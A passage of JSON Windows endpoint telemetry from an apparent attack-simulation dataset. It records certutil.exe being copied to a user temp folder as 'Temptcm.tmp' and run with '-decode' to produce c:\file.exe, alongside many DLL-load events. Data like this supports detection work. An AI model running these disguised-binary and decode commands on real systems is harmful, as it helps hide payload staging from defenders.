"image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3940, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501820000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - 
"pid": 3940, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501820000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3940, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501820000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" - }, - { - "command_line": "cmd.exe /c copy C:\\WINDOWS\\\\system32\\\\certutil.exe C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3452, - "ppid": 3940, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573502020000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}", - "unique_ppid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 
131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "file", - "file_name": "Temptcm.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\WINDOWS\\system32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - 
"image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "process", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573502140000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "process", - "pid": 3940, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573502140000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"cmd.exe /c %%temp%%tcm.tmp -decode c:\\file.exe\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1852, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573502260000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1852, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 
131883573502140000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1852, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502140000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1852, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502140000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1852, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502140000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1852, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502300000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" - }, - { - "command_line": "cmd.exe /c C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5572, - "ppid": 1852, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573502380016, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}", - "unique_ppid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
"image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5572, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502300000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5572, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502300000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5572, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502300000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5572, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502300000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5572, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502300000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" - }, - { - "command_line": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 976, - "ppid": 5572, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "subtype": "create", - "timestamp": 131883573502530000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}", - 
"unique_ppid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "Temptcm.tmp", - "image_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502610000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502610000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502610000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502610000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": 
"C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": 
"C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "normaliz.dll", - "image_path": "C:\\Windows\\System32\\normaliz.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "setupapi.dll", - "image_path": "C:\\Windows\\System32\\setupapi.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": 
"C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - 
"process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "Wldap32.dll", - "image_path": "C:\\Windows\\System32\\Wldap32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": 
"C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "certcli.dll", - "image_path": "C:\\Windows\\System32\\certcli.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "cabinet.dll", - "image_path": "C:\\Windows\\System32\\cabinet.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "comctl32.dll", - "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17134.441_none_f952a0bb30955e96\\comctl32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "cryptui.dll", - "image_path": "C:\\Windows\\System32\\cryptui.dll", - 
"pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "ncrypt.dll", - "image_path": "C:\\Windows\\System32\\ncrypt.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "netapi32.dll", - "image_path": "C:\\Windows\\System32\\netapi32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502770000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdsapi.dll", - "image_path": "C:\\Windows\\System32\\ntdsapi.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "secur32.dll", - "image_path": "C:\\Windows\\System32\\secur32.dll", - "pid": 976, - "process_name": 
"Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "ntasn1.dll", - "image_path": "C:\\Windows\\System32\\ntasn1.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "certca.dll", - "image_path": "C:\\Windows\\System32\\certca.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "dsrole.dll", - "image_path": "C:\\Windows\\System32\\dsrole.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": 
"C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "logoncli.dll", - "image_path": "C:\\Windows\\System32\\logoncli.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "cryptsp.dll", - "image_path": "C:\\Windows\\System32\\cryptsp.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573502920000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": 